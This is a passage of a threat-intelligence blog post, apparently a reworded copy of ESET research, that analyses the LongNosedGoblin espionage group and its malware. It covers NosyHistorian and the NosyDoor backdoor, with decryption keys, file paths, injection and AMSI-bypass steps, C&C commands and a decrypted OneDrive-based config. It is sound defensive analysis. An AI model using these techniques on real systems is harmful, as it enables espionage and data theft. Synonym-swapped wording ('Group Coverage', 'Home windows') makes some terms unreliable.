{"id":9978,"date":"2025-12-21T16:25:14","date_gmt":"2025-12-21T16:25:14","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=9978"},"modified":"2025-12-21T16:25:14","modified_gmt":"2025-12-21T16:25:14","slug":"longnosedgoblin-tries-to-smell-out-governmental-affairs-in-southeast-asia-and-japan","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=9978","title":{"rendered":"LongNosedGoblin tries to smell out governmental affairs in Southeast Asia and Japan"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>In 2024, ESET researchers seen beforehand undocumented malware within the community of a Southeast Asian governmental entity. This led us to uncover much more new malware on the identical system, none of which had substantial ties to any beforehand tracked risk actors. Based mostly on our findings, we determined to attribute the malicious instruments to a brand new China-aligned APT group that now we have named LongNosedGoblin.<\/p>\n<p>The group employs a diverse customized toolset consisting primarily of C#\/.NET functions, and, notably, makes use of Group Coverage to deploy its malware and transfer laterally throughout the techniques of focused entities. This blogpost particulars our discovery of LongNosedGoblin, goes over its identified campaigns, and dives into the toolset of the group.<\/p>\n<blockquote>\n<p><strong>Key factors of the report:<\/strong><\/p>\n<ul>\n<li>LongNosedGoblin is a newly found China-aligned APT group concentrating on governmental entities in Southeast Asia and Japan, with the objective of cyberespionage.<\/li>\n<li>The group has been lively since no less than September 2023.<\/li>\n<li>LongNosedGoblin makes use of Group Coverage to deploy malware throughout the compromised community, and cloud providers (e.g., Microsoft OneDrive and Google Drive) as command and management (C&amp;C) servers.<\/li>\n<li>One of many group\u2019s instruments, NosyHistorian, is used to assemble browser historical past and determine the place to deploy additional malware, such because the NosyDoor backdoor.<\/li>\n<li>NosyDoor is more than likely being shared by a number of China-aligned risk actors.<\/li>\n<li>We offer an in depth evaluation of NosyHistorian, NosyDoor, NosyStealer, NosyDownloader, NosyLogger, and different instruments utilized by LongNosedGoblin.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Smells like hassle: Introducing LongNosedGoblin<\/h2>\n<p>LongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan, with the objective of conducting cyberespionage. As we already talked about: in its campaigns, LongNosedGoblin abuses <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/manage\/group-policy\/group-policy-overview\" target=\"_blank\" rel=\"noopener\">Group Coverage<\/a> \u2013 a mechanism for managing settings and permissions on Home windows machines, sometimes used with Lively Listing \u2013 to deploy malware and transfer laterally throughout the compromised community.<\/p>\n<p>One of many important instruments in its arsenal is NosyHistorian, a C#\/.NET utility that the group makes use of to gather browser historical past, which is then used to find out the place to deploy additional malware. This contains one other main LongNosedGoblin software, a backdoor that we named NosyDoor, which, in campaigns we noticed, used Microsoft OneDrive as its C&amp;C server. NosyDoor additionally employs living-off-the-land strategies in its execution chain, particularly <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\" target=\"_blank\" rel=\"noopener\">AppDomainManager injection<\/a>. Lastly, a number of of the group\u2019s instruments can bypass the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/amsi\/antimalware-scan-interface-portal\" target=\"_blank\" rel=\"noopener\">Antimalware Scan Interface<\/a> (AMSI), which allows antimalware merchandise to scan numerous scripts earlier than execution.<\/p>\n<h3>Discovery<\/h3>\n<p>In February 2024, we discovered unknown malware on a system of a governmental entity in Southeast Asia. The malware was used to drop a customized backdoor, which we later named NosyDoor. On the identical time, we seen that the compromise concerned not only one, however a number of machines from the identical entity, with the malware having been deployed through Group Coverage.<\/p>\n<p>Further evaluation revealed that the identical victims have been additionally  with a distinct malicious software distributed through Group Coverage, this one used for accumulating browser historical past. We named the software NosyHistorian. Whereas we discovered many victims affected by NosyHistorian in the midst of our unique investigation between January and March 2024, solely a small subset of them have been compromised by NosyDoor. Some samples of NosyDoor\u2019s dropper even contained execution guardrails to restrict operation to particular victims\u2019 machines.<\/p>\n<p>Later, we recognized much more unknown malware on the victims\u2019 machines: NosyStealer, which exfiltrates browser knowledge; NosyDownloader, which downloads and runs a payload in reminiscence; NosyLogger, a keylogger; different instruments like a reverse SOCKS5 proxy; and an argument runner (a software that runs an utility handed as an argument) that was used to run a video recorder, possible <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/ffmpeg.org\/\">FFmpeg<\/a>, to seize audio and video. The downloader was first recorded in our telemetry way back to September 2023.<\/p>\n<h3>Attribution<\/h3>\n<p>As a result of distinctive toolset, alongside using Group Coverage for lateral motion, we determined to attribute the assaults to a brand new China-aligned APT group, and named it LongNosedGoblin. We seen some overlap within the file paths talked about in a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/securelist.com\/toddycat-traffic-tunneling-data-extraction-tools\/112443\/\" target=\"_blank\" rel=\"noopener\">Kaspersky blogpost about ToddyCat exercise<\/a>, an APT group with related <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/securelist.com\/toddycat\/106799\/\" target=\"_blank\" rel=\"noopener\">concentrating on<\/a>, however the malware in that report lacks code similarity with the malware thought of right here.<\/p>\n<p>It also needs to be famous that in June 2025, the Russian cybersecurity firm Photo voltaic printed a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web.archive.org\/web\/20250803114940\/https:\/rt-solar.ru\/solar-4rays\/blog\/5603\/\" target=\"_blank\" rel=\"noopener\">blogpost<\/a> on an APT group it refers to as Erudite Mogwai, which used a payload that carefully resembles LongNosedGoblin\u2019s NosyDoor. Based on the authors, Erudite Mogwai focused the IT infrastructure of a Russian authorities group and Russian IT corporations, utilizing the LuckyStrike Agent backdoor in its operations.<\/p>\n<p>Nevertheless, we can&#8217;t verify that Erudite Mogwai and LongNosedGoblin are one and the identical, as there&#8217;s a particular distinction in TTPs between the 2 teams. Notably, the Erudite Mogwai analysis doesn&#8217;t point out the abuse of Lively Listing Group Coverage for malware deployment \u2013 a method that&#8217;s fairly particular to LongNosedGoblin\u2019s operations.<\/p>\n<p>We later recognized one other occasion of a NosyDoor variant concentrating on a corporation in an EU nation, as soon as once more using totally different TTPs, and utilizing the Yandex Disk cloud service as a C&amp;C server. Using this NosyDoor variant means that the malware could also be shared amongst a number of China-aligned risk teams. That is additional corroborated by Photo voltaic\u2019s remark of the phrase <span style=\"font-family: courier new, courier, monospace;\">Paid<\/span> within the PDB path of NosyDoor, suggesting that the malware could also be commercially offered as a service \u2013 probably indicating it&#8217;s being bought or licensed to different risk actors.<\/p>\n<h3>Later campaigns<\/h3>\n<p>All through 2024, LongNosedGoblin was actively deploying NosyDownloader in Southeast Asia. In December of the identical 12 months, we detected an up to date model of NosyHistorian in Japan, however then noticed no subsequent exercise.<\/p>\n<p>In September 2025, we started seeing renewed exercise of the group in Southeast Asia. As in earlier campaigns, the risk actor leveraged Group Coverage to ship NosyHistorian to focused machines.<\/p>\n<p>Throughout this wave of assaults, we seen habits in line with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/software\/S0154\/\" target=\"_blank\" rel=\"noopener\">Cobalt Strike<\/a> utilization: a loader named <span style=\"font-family: courier new, courier, monospace;\">oci.dll<\/span> was downloaded on a single machine, with a payload named <span style=\"font-family: courier new, courier, monospace;\">ocapi.edb<\/span> loaded from disk. LongNosedGoblin then subsequently deployed the potential Cobalt Strike loader to chose machines through Group Coverage.<\/p>\n<p>Moreover, we noticed that one other related part, <span style=\"font-family: courier new, courier, monospace;\">mscorsvc.dll<\/span>, was downloaded, with its payload saved in <span style=\"font-family: courier new, courier, monospace;\">conf.ini<\/span>. This loader was then deployed to victims\u2019 machines utilizing Group Coverage, using the identical supply mechanism as <span style=\"font-family: courier new, courier, monospace;\">oci.dll<\/span>.<\/p>\n<h2>Nosing round: LongNosedGoblin\u2019s toolset<\/h2>\n<h3>NosyHistorian<\/h3>\n<p>NosyHistorian is a C#\/.NET utility with a self-explanatory inner identify <span style=\"font-family: courier new, courier, monospace;\">GetBrowserHistory<\/span>, because it, certainly, collects browser historical past. Within the noticed campaigns, the attackers used this software to realize perception in regards to the machines within the compromised infrastructure. Based mostly on this data, they picked a small subset of particular victims to compromise additional with their NosyDoor backdoor.<\/p>\n<p>We noticed the software being deployed through Group Coverage below the filename <span style=\"font-family: courier new, courier, monospace;\">Historical past.ini<\/span>, disguising the file as an INI file. In actuality, this can be a moveable executable (PE) file, with the objective more than likely being to mix in with different INI recordsdata <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/it-pro\/windows-server-2012-r2-and-2012\/dn789188(v=ws.11)#ini-files-extension\" target=\"_blank\" rel=\"noopener\">generally<\/a> saved within the Group Coverage cache listing.<\/p>\n<p>NosyHistorian iterates over all customers on the machine and retrieves the browser historical past from Google Chrome, Microsoft Edge, and Mozilla Firefox. Every historical past database file is copied to a short lived listing after which uploaded to a particular hardcoded SMB share throughout the native community of the compromised group. NosyHistorian\u2019s filename for every net browser\u2019s historical past file is listed in Desk\u00a01, the place <span style=\"font-family: courier new, courier, monospace;\"><profile_name\/><\/span> corresponds to net browser profiles.<\/p>\n<p style=\"text-align: center;\"><em>Desk\u00a01. Crafted historical past filenames by NosyHistorian<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"132\"><strong>Internet browser<\/strong><\/td>\n<td width=\"511\"><strong>Filename<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"132\">Google Chrome<\/td>\n<td width=\"511\"><span style=\"font-family: courier new, courier, monospace;\"><username>_<machine_name>_<profile_name>_History<\/profile_name><\/machine_name><\/username><\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\">Microsoft Edge<\/td>\n<td width=\"511\"><span style=\"font-family: courier new, courier, monospace;\"><username>_<machine_name>_edge_History<\/machine_name><\/username><\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\">Mozilla Firefox<\/td>\n<td width=\"511\"><span style=\"font-family: courier new, courier, monospace;\"><username>_<machine_name>_firefox_<profile_name>_places.sqlite<\/profile_name><\/machine_name><\/username><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Each this software and NosyDoor have related PDB paths and have been compiled from the <span style=\"font-family: courier new, courier, monospace;\">E:Csharp<\/span> listing, with the NosyHistorian PDB path being: <span style=\"font-family: courier new, courier, monospace;\">E:CsharpSharpMiscGetBrowserHistoryobjDebugGetBrowserHistory.pdb<\/span>.<\/p>\n<h3>NosyDoor<\/h3>\n<p>As acknowledged beforehand, the NosyDoor backdoor makes use of cloud providers, equivalent to Microsoft OneDrive, for its C&amp;C server. The malware has a reasonably simple, three-stage chain of execution, depicted in Determine\u00a01. The primary stage is a dropper that deploys the second stage, which includes a living-off-the-land assault utilizing the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\">AppDomainManager injection approach<\/a>, which is in flip used to execute the ultimate payload, the backdoor itself.<\/p>\n<p>NosyDoor collects metadata in regards to the sufferer\u2019s machine, together with the machine identify, username, the OS model, and the identify of the present course of, and sends all of it to the C&amp;C. It then retrieves and parses job recordsdata with instructions from the C&amp;C. The instructions permit it to exfiltrate recordsdata, delete recordsdata, and execute shell instructions, amongst different issues.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. NosyDoor execution chain\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-1-1.png\" alt=\"Figure 1. NosyDoor execution chain 1\" width=\"\" height=\"\"\/><figcaption><em>Determine 1. NosyDoor execution chain<\/em><\/figcaption><\/figure>\n<h4>NosyDoor Stage 1 \u2013 dropper<\/h4>\n<p>The malware\u2019s first stage is a dropper, particularly a C#\/.NET utility with the inner identify <span style=\"font-family: courier new, courier, monospace;\">OneClickOperation<\/span>. Similar as NosyHistorian, it&#8217;s deployed through Group Coverage. We&#8217;ve got seen the dropper masquerade as a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/desktop\/policy\/registry-policy-file-format\" target=\"_blank\" rel=\"noopener\">Registry Coverage file<\/a> through the use of the filename <span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span>, though we additionally noticed <span style=\"font-family: courier new, courier, monospace;\">Registry.plo<\/span>, which is rare (it might be a typo, or possibly the risk actors didn&#8217;t need the filename to battle with one other malicious file).<\/p>\n<p>The dropper base64 decodes embedded recordsdata and decrypts them through Information Encryption Commonplace (DES) with each key and initialization vector set to <span style=\"font-family: courier new, courier, monospace;\">UevAppMo<\/span> (the primary eight bytes of the string <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor<\/span>), then drops them to <span style=\"font-family: courier new, courier, monospace;\">C:WindowsMicrosoft.NETFramework<\/span> with the next filenames:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">log.cached<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">netfxsbs9.hkf<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe.config<\/span><\/li>\n<\/ul>\n<p>These filenames have been chosen intentionally to mix in with present recordsdata, because the listing usually comprises recordsdata named <span style=\"font-family: courier new, courier, monospace;\">SharedReg12.dll<\/span> and <span style=\"font-family: courier new, courier, monospace;\">netfxsbs12.hkf<\/span>.<\/p>\n<p>In its remaining steps, the dropper creates and begins a Home windows scheduled job with the identify <span style=\"font-family: courier new, courier, monospace;\">OneDrive Reporting Process-S-1-5-21-<guid\/><\/span> below the Microsoft job folder, the place <span style=\"font-family: courier new, courier, monospace;\"><guid\/><\/span> is a random GUID string. The scheduled job is answerable for executing the respectable <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span> within the <span style=\"font-family: courier new, courier, monospace;\">C:WindowsMicrosoft.NETFramework<\/span> listing throughout system startup. The dropper copies the respectable file from <span style=\"font-family: courier new, courier, monospace;\">C:WindowsSystem32<\/span> to the brand new location.<\/p>\n<p>The newer samples additionally embody an execution guardrail that makes the dropper operate solely on victims\u2019 computer systems with a particular machine identify (see Determine\u00a02).<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Dropper code with execution guardrails\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-2.png\" alt=\"Figure 2. Dropper code\" width=\"\" height=\"\"\/><figcaption><em>Determine 2. Dropper code with execution guardrails<\/em><\/figcaption><\/figure>\n<h4>NosyDoor Stage 2 \u2013 AppDomainManager injection<a rel=\"nofollow\" target=\"_blank\" id=\"NosyDoor Stage 2 \u2013 AppDomainManager injection\"\/><\/h4>\n<p><span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span> is a respectable C#\/.NET utility, which the malware copied from the <span style=\"font-family: courier new, courier, monospace;\">C:WindowsSystem32<\/span> to the <span style=\"font-family: courier new, courier, monospace;\">C:WindowsMicrosoft.NETFramework<\/span> listing and used as a living-off-the-land binary, or <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/lolbas-project.github.io\/\" target=\"_blank\" rel=\"noopener\">LOLBin<\/a>. Residing-off-the-land assaults abuse respectable instruments already current on the system. On this case, the applying is used to set off <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web.archive.org\/web\/20250330053546\/https:\/www.rapid7.com\/blog\/post\/2023\/05\/05\/appdomain-manager-injection-new-techniques-for-red-teams\/\" target=\"_blank\" rel=\"noopener\">AppDomainManager injection<\/a> through a configuration file. This method could make functions constructed within the .NET framework load malicious code as an alternative of the meant respectable code by making use of the AppDomainManager class.<\/p>\n<p>When the applying is executed, it hundreds the configuration file proven in Determine\u00a03, which makes the applying name the <span style=\"font-family: courier new, courier, monospace;\">InitializeNewDomain<\/span> methodology of the customized <span style=\"font-family: courier new, courier, monospace;\">SharedReg<\/span> class in <span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span>. The configuration additionally units the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/framework\/configure-apps\/file-schema\/runtime\/etwenable-element\" target=\"_blank\" rel=\"noopener\"><etwenable> ingredient\u2019s<\/etwenable><\/a> <span style=\"font-family: courier new, courier, monospace;\">enabled<\/span> attribute to <span style=\"font-family: courier new, courier, monospace;\">false<\/span> in order that occasion tracing for Home windows is disabled.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. Content of UevAppMonitor.exe.config with specified AppDomainManager\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-3.png\" alt=\"Figure 3. Content of UevAppMonitor.exe.config with specified AppDomainManager\" width=\"\" height=\"\"\/><figcaption><em>Determine 3. Content material of <\/em><span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span><em>.config with specified AppDomainManager<\/em><\/figcaption><\/figure>\n<p><span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span> comprises code to bypass <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/amsi\/antimalware-scan-interface-portal\" target=\"_blank\" rel=\"noopener\">AMSI<\/a>, from an open-source AV\/EDR evasion framework referred to as <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/klezVirus\/inceptor\" target=\"_blank\" rel=\"noopener\">inceptor<\/a>. Aside from that, it base64 decodes the file <span style=\"font-family: courier new, courier, monospace;\">netfxsbs9.hkf<\/span>, decrypts the consequence through AES with key <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor<\/span>, padded with null bytes till its size is 16, initialization vector <span style=\"font-family: courier new, courier, monospace;\">0<\/span>, and ultimately base64 decodes the consequence once more. The result&#8217;s NosyDoor, which is then executed. Any errors are written to the file <span style=\"font-family: courier new, courier, monospace;\">error.txt<\/span> within the <span style=\"font-family: courier new, courier, monospace;\">C:WindowsMicrosoft.NETFramework<\/span> listing.<\/p>\n<h4>NosyDoor Stage 3 \u2013 payload<\/h4>\n<p>NosyDoor\u2019s third stage, the primary payload, is a C#\/.NET backdoor with the inner identify OneDrive and with PDB path <span style=\"font-family: courier new, courier, monospace;\">E:CsharpThomasServerThomasOneDriveobjReleaseOneDrive.pdb<\/span>. As this identify suggests, the backdoor makes use of cloud providers, on this case Microsoft OneDrive, as a C&amp;C server.<\/p>\n<p>The total listing of metadata the backdoor collects consists of the next:<\/p>\n<ul>\n<li>exterior IPv4 tackle,<\/li>\n<li>native IPv4 tackle,<\/li>\n<li>agent ID,<\/li>\n<li>username,<\/li>\n<li>machine identify,<\/li>\n<li>present listing,<\/li>\n<li>present course of (identify, ID, structure),<\/li>\n<li>stage 3 native begin time,<\/li>\n<li>present native time,<\/li>\n<li>OS model,<\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">CodeType<\/span> (see Desk 3), and<\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">AgentType<\/span> (see Desk 3).<\/li>\n<\/ul>\n<p>All collected metadata is encrypted through RSA after which uploaded to OneDrive because the file <span style=\"font-family: courier new, courier, monospace;\">Read_<agent_id>.max<\/agent_id><\/span>. As soon as NosyDoor sends the metadata, it seems for instructions from the C&amp;C in job recordsdata with <span style=\"font-family: courier new, courier, monospace;\">.max<\/span> extensions within the following listing:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\"><foldername>&#8211;<listenerid>\/<agent_id>\/<payload.taskfoldername\/><\/agent_id><\/listenerid><\/foldername><\/span><\/p>\n<p>Every job file comprises an encrypted command, which is encapsulated with values taken from the backdoor\u2019s configuration:<\/p>\n<p>The command is then decoded with base64 and decrypted through AES with key <span style=\"font-family: courier new, courier, monospace;\"><payload.key\/><\/span> and initialization vector <span style=\"font-family: courier new, courier, monospace;\">0<\/span>. All instructions are described in Desk\u00a02. Though the command <span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_TASKSCHEDULER<\/span> is talked about within the code, it&#8217;s not carried out in any of the noticed samples.<\/p>\n<p style=\"text-align: center;\"><em>Desk\u00a02. Instructions supported by NosyDoor<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"198\"><strong>Command<\/strong><\/td>\n<td width=\"444\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_SHELL<\/span><\/td>\n<td width=\"444\">Execute a shell command.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_EXEC_ASM<\/span><\/td>\n<td width=\"444\">Load a .NET meeting.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_EXIT<\/span><\/td>\n<td width=\"444\">Stop NosyDoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_REMOVE<\/span><\/td>\n<td width=\"444\">Delete a file and listing its unique listing.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_DOWNLOAD<\/span><\/td>\n<td width=\"444\">Exfiltrate a file. Word that obtain and add instructions are right here named by way of the attacker\u2019s perspective, treating the C&amp;C machine because the native machine and the sufferer machine because the distant one.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_UPLOAD<\/span><\/td>\n<td width=\"444\">Add a file to the sufferer\u2019s machine, delete it from OneDrive, and listing the listing the place the file was uploaded.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_DRIVES<\/span><\/td>\n<td width=\"444\">Get names and sizes of logical drives current on the machine.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_FILE_BROWSE<\/span><\/td>\n<td width=\"444\">Get hold of a listing itemizing, together with file icons.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_SLEEP<\/span><\/td>\n<td width=\"444\">Set the beaconing interval.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_TASKSCHEDULER<\/span><\/td>\n<td width=\"444\">Not carried out.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span style=\"font-family: courier new, courier, monospace;\">CMD_TYPE_Plugin<\/span><\/td>\n<td width=\"444\">Load a .NET meeting, instantly calling the strategy <span style=\"font-family: courier new, courier, monospace;\">Plugin.Run<\/span>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>After executing the command, NosyDoor performs the reverse steps \u2013 encrypts command output utilizing AES, encodes with base64, and encapsulates with the strings <span style=\"font-family: courier new, courier, monospace;\"><payload.prepend><payload.payloadprepend\/><\/payload.prepend><\/span> and <span style=\"font-family: courier new, courier, monospace;\"><payload.payloadappend><payload.append\/><\/payload.payloadappend><\/span>. Every result&#8217;s saved on the C&amp;C server in a file with a filename specifying native time (Unix timestamp multiplied by 100,000) and ending with the <span style=\"font-family: courier new, courier, monospace;\">.max<\/span> extension:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\"><foldername>&#8211;<listenerid>\/<agent_id>\/<payload.receivefoldername>\/<unix_timestamp>.max<\/unix_timestamp><\/payload.receivefoldername><\/agent_id><\/listenerid><\/foldername><\/span><\/p>\n<p>If an exception happens throughout NosyDoor\u2019s operation, the backdoor writes the exception message along with the native time to <span style=\"font-family: courier new, courier, monospace;\">C:UsersPublicLibrariesthomas.log<\/span>.<\/p>\n<p>The backdoor comprises a customized dependency named <span style=\"font-family: courier new, courier, monospace;\">Library<\/span> that&#8217;s embedded as a useful resource through the use of <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/Fody\/Costura\">Costura<\/a>. It primarily comprises code associated to command processing, Microsoft OneDrive communication, and numerous helper strategies, whereas the primary binary handles the beaconing loop and reads a config file, using the library.<\/p>\n<p>The configuration is saved within the file <span style=\"font-family: courier new, courier, monospace;\">log.cached<\/span> in encrypted kind. NosyDoor decrypts it through XOR with key <span style=\"font-family: courier new, courier, monospace;\">SecretKey<\/span>, base64 decodes it, then decrypts it through AES with key <span style=\"font-family: courier new, courier, monospace;\">Thomas<\/span>, stuffed with null bytes till its size is 16, and IV <span style=\"font-family: courier new, courier, monospace;\">0<\/span>. This configuration might be seen in Determine\u00a04.<\/p>\n<pre class=\"language-markup\"><code>{\n    \"ListenerID\": 3,\n    \"FolderName\": \"Duis euismod, mi, ligula, mattis feugiat, pulvinar.\",\n    \"AppID\": \"[redacted]\",\n    \"RefreshToken\": \"[redacted]\",\n    \"BaseUrl\": \"https:\/\/graph.microsoft.com\/v1.0\/drive\",\n    \"TokenUrl\": \"https:\/\/login.microsoftonline.com\/frequent\/oauth2\/v2.0\/token\",\n    \"CodeType\": \".NET40\",\n    \"AgentType\": \"OneDrive\",\n    \"Scope\": \"offline_access recordsdata.readwrite\",\n    \"Sleep\": 66,\n    \"BeginDate\": \"08:51:00\",\n    \"EndDate\": \"18:51:00\",\n    \"Payload\": {\n        \"Key\": \"583oq23aonxloet7\",\n        \"MetaDataName\": null,\n        \"TaskFolderName\": \"Risus blandit mattis\",\n        \"ReceiveFolderName\": \"Felis posuere at\",\n        \"Prepend\": \"\n\n    \n    <meta http-equiv=\"&quot;Content-Type&quot;\" content=\"&quot;text\/html;\" charset=\"iso-8859-1&quot;\"\/>\n    <title>IIS Home windows Server<\/title>\n    \n    \n    \n        <div id=\"&quot;container&quot;\">\n        <a rel=\"nofollow\" target=\"_blank\" href=\"&quot;http:\/\/go.microsoft.com\/fwlink\/?linkid=66138u0026amp;clcid=0x409&quot;\"><img decoding=\"async\" src=\"&quot;iisstart.png&quot;\" alt=\"&quot;IIS&quot;\" width=\"&quot;960&quot;\" height=\"&quot;600&quot;\"\/><\/a>\n        <\/div>\n    \n\",\n        \"PayloadPrepend\": \"Fames\",\n        \"PayloadAppend\": \"Ipsum\"\n    }\n}<\/code><\/pre>\n<p style=\"text-align: center;\"><em>Determine\u00a04. Decrypted configuration (<\/em><span style=\"font-family: courier new, courier, monospace;\">log.cached<\/span><em>, beautified)<\/em><\/p>\n<p>The configuration values <span style=\"font-family: courier new, courier, monospace;\"><begindate\/><\/span> and <span style=\"font-family: courier new, courier, monospace;\"><enddate\/><\/span> specify the native time vary when NosyDoor operates. On this case, NosyDoor is lively solely between 8:51 am and 6:51 pm. As soon as authenticated, although, NosyDoor will course of instructions which can be nonetheless pending in a queue and ship response recordsdata no matter what time it&#8217;s.<\/p>\n<h3>NosyStealer<\/h3>\n<p>NosyStealer is used to steal browser knowledge from Microsoft Edge and Google Chrome. As illustrated in Determine\u00a05, it has a four-stage chain of execution, with the stealer part being the final-stage payload.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. NosyStealer execution chain\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-5-1.png\" alt=\"Figure 5. NosyStealer execution chain )2)\" width=\"\" height=\"\"\/><figcaption><em>Determine 5. NosyStealer execution chain<\/em><\/figcaption><\/figure>\n<h4>NosyStealer Stage 1 \u2013 DLL loader<\/h4>\n<p>The primary stage (<span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span>) within the NosyStealer chain is a C\/C++ utility. The noticed pattern merely hundreds a library named <span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span> from disk and calls the exported operate <span style=\"font-family: courier new, courier, monospace;\">Whats up<\/span>.<\/p>\n<h4>NosyStealer Stage 2 \u2013 injector<a rel=\"nofollow\" target=\"_blank\" id=\"NosyStealer Stage 2 \u2013 injector\"\/><\/h4>\n<p>We noticed two NosyStealer Stage 2 samples \u2013 one (<span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span>) in our telemetry, and the opposite (<span style=\"font-family: courier new, courier, monospace;\">msi.dll<\/span>) uploaded to <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.virustotal.com\/gui\/file\/5959d4414cc6764212679eec7c9ed5911eed6d24f310bc7b9ba570e11b84be8f\">VirusTotal<\/a> from Malaysia. Neither has the exported operate <span style=\"font-family: courier new, courier, monospace;\">Whats up<\/span> however each have the primary code in <span style=\"font-family: courier new, courier, monospace;\">DllMain<\/span>, i.e., the malicious code is run proper after the DLL is loaded. They&#8217;ve the next exports:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">??0Cv2dllnoinject@@QEAA@XZ<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">??4Cv2dllnoinject@@QEAAAEAV0@$$QEAV0@@Z<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">??4Cv2dllnoinject@@QEAAAEAV0@AEBV0@@Z<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">?fnv2dllnoinject@@YAHXZ<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">?nv2dllnoinject@@3HA<\/span><\/li>\n<\/ul>\n<p>The subsequent-stage knowledge is loaded from the hardcoded path <span style=\"font-family: courier new, courier, monospace;\">C:ProgramDataMicrosoftWDFMDE.dat<\/span>. It&#8217;s decrypted through a single-byte XOR cipher with key <span 